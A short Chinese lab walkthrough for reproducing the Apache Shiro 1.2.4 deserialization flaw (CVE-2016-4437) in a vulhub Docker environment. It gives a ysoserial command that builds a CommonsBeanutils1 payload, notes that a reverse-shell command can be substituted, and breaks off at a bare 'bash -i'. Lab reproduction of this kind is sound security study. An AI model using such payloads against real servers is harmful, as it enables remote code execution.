Apache Shiro 1.2.4反序列化漏洞复现
1. 环境搭建
安装漏洞靶场vulhub
git clone git://github.com/vulhub/vulhub.git
下载安装ysoserial
项目源地址:https://github.com/frohoff/ysoserial
jar包下载地址:https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
2. 漏洞复现
1、 进入到我们下载好的vulhub shiro反序列化漏洞靶场:
cd vulhub/shiro/CVE-2016-4437/
docker-compose up -d
2、打开我们本地的浏览器访问虚拟机的IP地址加8080端口:
默认的登陆账号密码:admin\vulhub
3、使用ysoserial生成CommonsBeanutils1的Gadget:
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /opt/wula" > poc.ser
# 要反弹sheel的就将命令换成反弹shell命令,ysoserial命令也需要更换,这里就不做详解了。
bash -i